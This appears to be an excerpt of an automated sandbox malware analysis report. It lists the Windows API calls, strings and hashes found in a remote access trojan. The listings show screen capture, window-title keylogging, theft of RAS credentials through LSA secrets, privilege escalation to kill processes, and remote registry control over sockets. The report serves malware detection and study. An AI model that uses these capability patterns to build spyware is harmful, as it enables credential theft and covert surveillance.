                                                                                              • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ??2@$CloseCursorHandleLoadObjectSingleWait
                                                                                              • String ID:
                                                                                              • API String ID: 1916621575-0
                                                                                              • Opcode ID: 1eb705cd905c0f146ef5bf02cb5afe729e58b6fb5cf2b9490db994987b313b70
                                                                                              • Instruction ID: b70eef93bc3be5527f367b70327705cb0ffa67acdb31b1760f540c4c307e6a46
                                                                                              • Opcode Fuzzy Hash: 1eb705cd905c0f146ef5bf02cb5afe729e58b6fb5cf2b9490db994987b313b70
                                                                                              • Instruction Fuzzy Hash: FC31C1B0B04741ABE320DF348C52B5BBAE1EB45750F000A2CF2969BAD1DBB1E5488792
                                                                                              APIs
                                                                                              • CreateDIBSection.GDI32(10010206,?,00000000,10010206,00000000,00000000), ref: 1001042E
                                                                                              • SelectObject.GDI32(?,00000000), ref: 1001043D
                                                                                              • BitBlt.GDI32(?,?,?,?,?,?,?,?,?), ref: 1001045A
                                                                                              • BitBlt.GDI32(?,00000000,00000000,?,?,?,?,?,00CC0020), ref: 1001047A
                                                                                              • DeleteObject.GDI32(?), ref: 100104A2
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Object$CreateDeleteSectionSelect
                                                                                              • String ID:
                                                                                              • API String ID: 3188413882-0
                                                                                              • Opcode ID: 6914c3d10498faa931e45aa64833eb2ce3589ba839e4f727551740e0ed738175
                                                                                              • Instruction ID: 86756e093dbd4203ef58af1e2a4b75b8c92c1fe1a1b021b6ca6aa4606f99d77a
                                                                                              • Opcode Fuzzy Hash: 6914c3d10498faa931e45aa64833eb2ce3589ba839e4f727551740e0ed738175
                                                                                              • Instruction Fuzzy Hash: 7231D5B6200705AFE214CF59CC85E27F7AAFB88710F108A1DFA5587791C7B1F9408BA0
                                                                                              APIs
                                                                                              • GetForegroundWindow.USER32(?), ref: 10009906
                                                                                              • GetWindowTextA.USER32(00000000,1007E2FC,00000400), ref: 1000991C
                                                                                              • lstrlen.KERNEL32(1007E2FC), ref: 10009951
                                                                                              • GetLocalTime.KERNEL32(?), ref: 10009964
                                                                                              • wsprintfA.USER32 ref: 100099B9
                                                                                                • Part of subcall function 100097A0: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 100097B4
                                                                                                • Part of subcall function 100097A0: CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000004,00000080,00000000), ref: 1000986B
                                                                                                • Part of subcall function 100097A0: GetFileSize.KERNEL32(00000000,00000000), ref: 1000987E
                                                                                                • Part of subcall function 100097A0: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 10009892
                                                                                                • Part of subcall function 100097A0: lstrlen.KERNEL32(?), ref: 100098A0
                                                                                                • Part of subcall function 100097A0: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 100098A9
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: File$Windowlstrlen$??2@CreateDirectoryForegroundLocalPointerSizeSystemTextTimewsprintf
                                                                                              • String ID:
                                                                                              • API String ID: 1247169605-0
                                                                                              • Opcode ID: 1df0067ec9095a37b7ec69bcb802230090b704360ccb88951738f67c71e14fa4
                                                                                              • Instruction ID: 4f7ab4636ff0803a810951040c387652c581d68020769500fe1f8d2c0b4bc754
                                                                                              • Opcode Fuzzy Hash: 1df0067ec9095a37b7ec69bcb802230090b704360ccb88951738f67c71e14fa4
                                                                                              • Instruction Fuzzy Hash: FB21A1B12052636BE304CB18CC95A6776AAEF8C300F408A38F281D76A1D67C9D498659
                                                                                              APIs
                                                                                              • Sleep.KERNEL32(00000064), ref: 100113C1
                                                                                              • LocalAlloc.KERNEL32(00000040,?), ref: 10011403
                                                                                              • ReadFile.KERNEL32(?,00000000,?,00000000,00000000), ref: 1001141C
                                                                                              • Sleep.KERNEL32(00000001,00000000,00000000), ref: 10011431
                                                                                              • LocalFree.KERNEL32(00000000), ref: 10011434
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: LocalSleep$AllocFileFreeRead
                                                                                              • String ID:
                                                                                              • API String ID: 175009107-0
                                                                                              • Opcode ID: bf2ef6bc8ebea7897a9c7f3b59668ea674f0e4ecd9d9d3187eed418d19d2a9dc
                                                                                              • Instruction ID: 73315cb63eaab40e7695a76611e533bd3f9cb332f13e7bafef01b234fadabf49
                                                                                              • Opcode Fuzzy Hash: bf2ef6bc8ebea7897a9c7f3b59668ea674f0e4ecd9d9d3187eed418d19d2a9dc
                                                                                              • Instruction Fuzzy Hash: 42211D71204352ABE304DF65CC85FAB77EDEB88B00F00491CB755EA284D7B0E9488B76
                                                                                              APIs
                                                                                              • GetCurrentThreadId.KERNEL32 ref: 10012A58
                                                                                              • GetThreadDesktop.USER32(00000000), ref: 10012A5F
                                                                                              • GetUserObjectInformationA.USER32(?,00000002,?,00000100,?), ref: 10012A80
                                                                                              • SetThreadDesktop.USER32(?), ref: 10012A94
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Thread$Desktop$CurrentInformationObjectUser
                                                                                              • String ID:
                                                                                              • API String ID: 3041254040-0
                                                                                              • Opcode ID: 556f9f34ce626c626d025b5ad994241f14c7a72d7fb554adc5a2ad2683bfa424
                                                                                              • Instruction ID: b6529946467a443cafd68ee4fafc1a010a5a5dac77649d55f7b29be3a82e6d96
                                                                                              • Opcode Fuzzy Hash: 556f9f34ce626c626d025b5ad994241f14c7a72d7fb554adc5a2ad2683bfa424
                                                                                              • Instruction Fuzzy Hash: A0F059B12003606BF3109729DCC9BEF3769EF84725F804035F640C2050FBF889C581A2
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Sleeplstrlenwsprintf
                                                                                              • String ID: Host$SYSTEM\CurrentControlSet\Services\%s
                                                                                              • API String ID: 1736695411-3973614608
                                                                                              • Opcode ID: 8131760f708bed2bd4ce06e64e052545d9e5e77d913a46266ffcad926d35ad94
                                                                                              • Instruction ID: 42bb8f1d3cbc34b1093e393aafb0570189901e8aeaae8089c09646219bf79e8e
                                                                                              • Opcode Fuzzy Hash: 8131760f708bed2bd4ce06e64e052545d9e5e77d913a46266ffcad926d35ad94
                                                                                              • Instruction Fuzzy Hash: A9F0E2B5500321BFF320AB54DC49FEB3BA9DFC4308F004818FB48A6191D2B56989C6E7
                                                                                              APIs
                                                                                              • setsockopt.WS2_32(?,0000FFFF,00000080,00000000), ref: 10003DDA
                                                                                              • CancelIo.KERNEL32(?), ref: 10003DE7
                                                                                              • InterlockedExchange.KERNEL32(?,00000000), ref: 10003DF6
                                                                                              • closesocket.WS2_32(?), ref: 10003E03
                                                                                              • SetEvent.KERNEL32(?), ref: 10003E10
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CancelEventExchangeInterlockedclosesocketsetsockopt
                                                                                              • String ID:
                                                                                              • API String ID: 1486965892-0
                                                                                              • Opcode ID: dd51bebf1240dcd95c78d2e4838092bba280de6a908707723a9b60bc76aba793
                                                                                              • Instruction ID: 5bdee382e423177a237ef2210d66a0bf4d0f96213256af2b3b43e88352a19dbf
                                                                                              • Opcode Fuzzy Hash: dd51bebf1240dcd95c78d2e4838092bba280de6a908707723a9b60bc76aba793
                                                                                              • Instruction Fuzzy Hash: 86F01275204751BFE7248B70CC88F9777A9AF49711F104A1DF69A462D0CFB0A8489756
                                                                                              APIs
                                                                                              • CoCreateInstance.OLE32(10077218,00000000,00000001,10077188,?), ref: 10068D70
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CreateInstance
                                                                                              • String ID: FriendlyName
                                                                                              • API String ID: 542301482-3623505368
                                                                                              • Opcode ID: 376f0a869480533741e609f354106b8f4a325d2b9cf872eab34320efc47df62d
                                                                                              • Instruction ID: afc3467e9830297f3d24d847b1d2bb17e406cd0b2032fd1a6252cdea2ef9d69a
                                                                                              • Opcode Fuzzy Hash: 376f0a869480533741e609f354106b8f4a325d2b9cf872eab34320efc47df62d
                                                                                              • Instruction Fuzzy Hash: 6B4118B1204341AFD610CF54CD84F5BB7E9FBC9B24F108A18B599DB290DB75E905CB62
                                                                                              APIs
                                                                                              • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 1000D0FB
                                                                                              • DeleteFileA.KERNEL32(?), ref: 1000D1A8
                                                                                                • Part of subcall function 1000CF40: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 1000CF72
                                                                                                • Part of subcall function 1000CF40: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 1000D029
                                                                                                • Part of subcall function 1000CF40: GetFileSize.KERNEL32(00000000,00000000), ref: 1000D038
                                                                                                • Part of subcall function 1000CF40: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 1000D041
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: File$DirectorySystem$??2@CreateDeleteSize
                                                                                              • String ID: .key$XXXXXX
                                                                                              • API String ID: 2930496114-2601115946
                                                                                              • Opcode ID: 618e3a8066daa58dc8d3c319f89987d837cd6fe4a550a7d12166253bdad2604e
                                                                                              • Instruction ID: 92a9d9676dfbc10a34597c778cdfdecbd90440fd8d0599ce9f46a22b4502f86a
                                                                                              • Opcode Fuzzy Hash: 618e3a8066daa58dc8d3c319f89987d837cd6fe4a550a7d12166253bdad2604e
                                                                                              • Instruction Fuzzy Hash: 5B310436A005085BD728DAB888527AEBB96FB84770F14036EFA27872C0DFF45D458290
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: mallocstrrchr
                                                                                              • String ID: D
                                                                                              • API String ID: 4015919094-2746444292
                                                                                              • Opcode ID: fbf76794677e61538c32722502434da418faac4525dead3320a30888519af9fe
                                                                                              • Instruction ID: 2b82c579dc5669429a94ef84c94f4a8368c9f4a2e82ed412c6c1b6dee6f6c207
                                                                                              • Opcode Fuzzy Hash: fbf76794677e61538c32722502434da418faac4525dead3320a30888519af9fe
                                                                                              • Instruction Fuzzy Hash: C5115BB62042104BE704DA28AC406AB77DAF7D5732F04053EFE46C7340DABA994EC7B2
                                                                                              APIs
                                                                                              • LsaOpenPolicy.ADVAPI32(00000000,?,00000004,?), ref: 100071D2
                                                                                              • LsaRetrievePrivateData.ADVAPI32(?,?,?), ref: 10007205
                                                                                              Strings
                                                                                              • L$_RasDefaultCredentials#0, xrefs: 100071B5
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: DataOpenPolicyPrivateRetrieve
                                                                                              • String ID: L$_RasDefaultCredentials#0
                                                                                              • API String ID: 1655749231-2801509457
                                                                                              • Opcode ID: 2d21782bc5c36114cb19ed2205da1e80d6db33661989c39e1f2bf4eafcba104b
                                                                                              • Instruction ID: 93c318e700ec90dad194951c1228eb78b341e21d1d7da0fe05d388e2d6e220d4
                                                                                              • Opcode Fuzzy Hash: 2d21782bc5c36114cb19ed2205da1e80d6db33661989c39e1f2bf4eafcba104b
                                                                                              • Instruction Fuzzy Hash: C401D8722043026FE704DA69CC81DBBB3D9EBD4254F408D2DF544C6180EA74E949C3A2
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: strrchr
                                                                                              • String ID: Ball Update$D
                                                                                              • API String ID: 3418686817-2654422192
                                                                                              • Opcode ID: 648673b69d33e9f8df7bed818b0523f87ebe886c01c8110b764cbfd1cf2ca8ba
                                                                                              • Instruction ID: af045223c8d01c426d59768339580e9410ad83be0f7cb1058ad73a08f3e68785
                                                                                              • Opcode Fuzzy Hash: 648673b69d33e9f8df7bed818b0523f87ebe886c01c8110b764cbfd1cf2ca8ba
                                                                                              • Instruction Fuzzy Hash: 4FF049710082515BE700DB2CDC51BDB37F9EBC3765F840539FA8582250E779858E86E7
                                                                                              APIs
                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00200020,?,00000000,?,0040446F,00200020,00000000,?,00000000), ref: 004050B6
                                                                                              • LCMapStringW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,?,0040446F,00200020,00000000,?,00000000), ref: 004050CC
                                                                                              • LCMapStringW.KERNEL32(?,?,?,00000000,oD@ ,?,?,0040446F,00200020,00000000,?,00000000), ref: 004050FF
                                                                                              • LCMapStringW.KERNEL32(00000000,?,?,?,?,00000000,?,0040446F,00200020,00000000,?,00000000), ref: 00405167
                                                                                              • WideCharToMultiByte.KERNEL32(?,00000220,?,00000000,oD@ ,?,00000000,00000000,?,00000000,?,0040446F,00200020,00000000,?,00000000), ref: 0040518C
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2612467776.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2605808787.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2617496630.0000000000406000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2623270724.0000000000407000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2628429149.000000000042E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2634431094.0000000000430000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_server.jbxd
                                                                                              Similarity
                                                                                              • API ID: String$ByteCharMultiWide
                                                                                              • String ID: oD@
                                                                                              • API String ID: 352835431-4270158488
                                                                                              • Opcode ID: 1a3e656dce507ef5684df938aa75e947694e038f5f6d888d555c42b369e4d593
                                                                                              • Instruction ID: 4358d16d81b6b97c962036346be1bb4ce46d92d5ac57d3850fb05990df2a4d70
                                                                                              • Opcode Fuzzy Hash: 1a3e656dce507ef5684df938aa75e947694e038f5f6d888d555c42b369e4d593
                                                                                              • Instruction Fuzzy Hash: C2112832900619ABDF228F94DD00ADFBBB5EB48394F108166FA11761A0D3368D60DF94
                                                                                              APIs
                                                                                              • OutputDebugStringA.KERNEL32(s Loop_RegeditManager(SOCKET sRemote)), ref: 10009ED7
                                                                                                • Part of subcall function 10003780: WSAStartup.WS2_32(00000202,?), ref: 100037ED
                                                                                                • Part of subcall function 10003780: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 100037FB
                                                                                                • Part of subcall function 10003940: ResetEvent.KERNEL32(?,76F923A0,00000000,?,?,?,?,?,10002644,?,?), ref: 10003953
                                                                                                • Part of subcall function 10003940: socket.WS2_32 ref: 10003966
                                                                                              • OutputDebugStringA.KERNEL32(s !socketClient.Connect !=-1), ref: 10009F23
                                                                                                • Part of subcall function 10003880: WaitForSingleObject.KERNEL32(?,000000FF,00000000,76F92EE0,?,00000000,10069CEC,000000FF,100027A0), ref: 100038BC
                                                                                                • Part of subcall function 10003880: CloseHandle.KERNEL32(?), ref: 100038DF
                                                                                                • Part of subcall function 10003880: CloseHandle.KERNEL32(?), ref: 100038E8
                                                                                                • Part of subcall function 10003880: WSACleanup.WS2_32 ref: 100038EA
                                                                                              Strings
                                                                                              • s Loop_RegeditManager(SOCKET sRemote), xrefs: 10009ED2
                                                                                              • s !socketClient.Connect !=-1, xrefs: 10009F1E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CloseDebugEventHandleOutputString$CleanupCreateObjectResetSingleStartupWaitsocket
                                                                                              • String ID: s !socketClient.Connect !=-1$s Loop_RegeditManager(SOCKET sRemote)
                                                                                              • API String ID: 660129190-2143064718
                                                                                              • Opcode ID: cf6971e579b135155909e727a0b979c8128c65cc8493ae3f99d5ed024adca8a6
                                                                                              • Instruction ID: e6927e26891a02968b8d8c746bac23e7cdf3acfa35c335dd7adad3e8361e2961
                                                                                              • Opcode Fuzzy Hash: cf6971e579b135155909e727a0b979c8128c65cc8493ae3f99d5ed024adca8a6
                                                                                              • Instruction Fuzzy Hash: E1119EB50087819AE364DFA4D941B9BB798EF94760F008A0DE5A9632C5DF34290CCB73
                                                                                              APIs
                                                                                                • Part of subcall function 10011F80: GetCurrentProcess.KERNEL32(00000028,?,?,10009CF0,?,00000000,00000000,00000001), ref: 10011F90
                                                                                                • Part of subcall function 10011F80: OpenProcessToken.ADVAPI32(00000000,?,10009CF0,?,00000000,00000000,00000001), ref: 10011F97
                                                                                              • OpenProcess.KERNEL32(001F0FFF,00000000,00000000), ref: 10011F33
                                                                                              • TerminateProcess.KERNEL32(00000000,00000000), ref: 10011F3E
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 10011F45
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Process$Open$CloseCurrentHandleTerminateToken
                                                                                              • String ID: SeDebugPrivilege
                                                                                              • API String ID: 3822579153-2896544425
                                                                                              • Opcode ID: 88327105c846fcc13900bef19591bfffc91d2265c3eb9a717cc263b54f5821ef
                                                                                              • Instruction ID: 462bede0e6496ce79bcfb719127096f46805a777cb0c1315f10224566a174b47
                                                                                              • Opcode Fuzzy Hash: 88327105c846fcc13900bef19591bfffc91d2265c3eb9a717cc263b54f5821ef
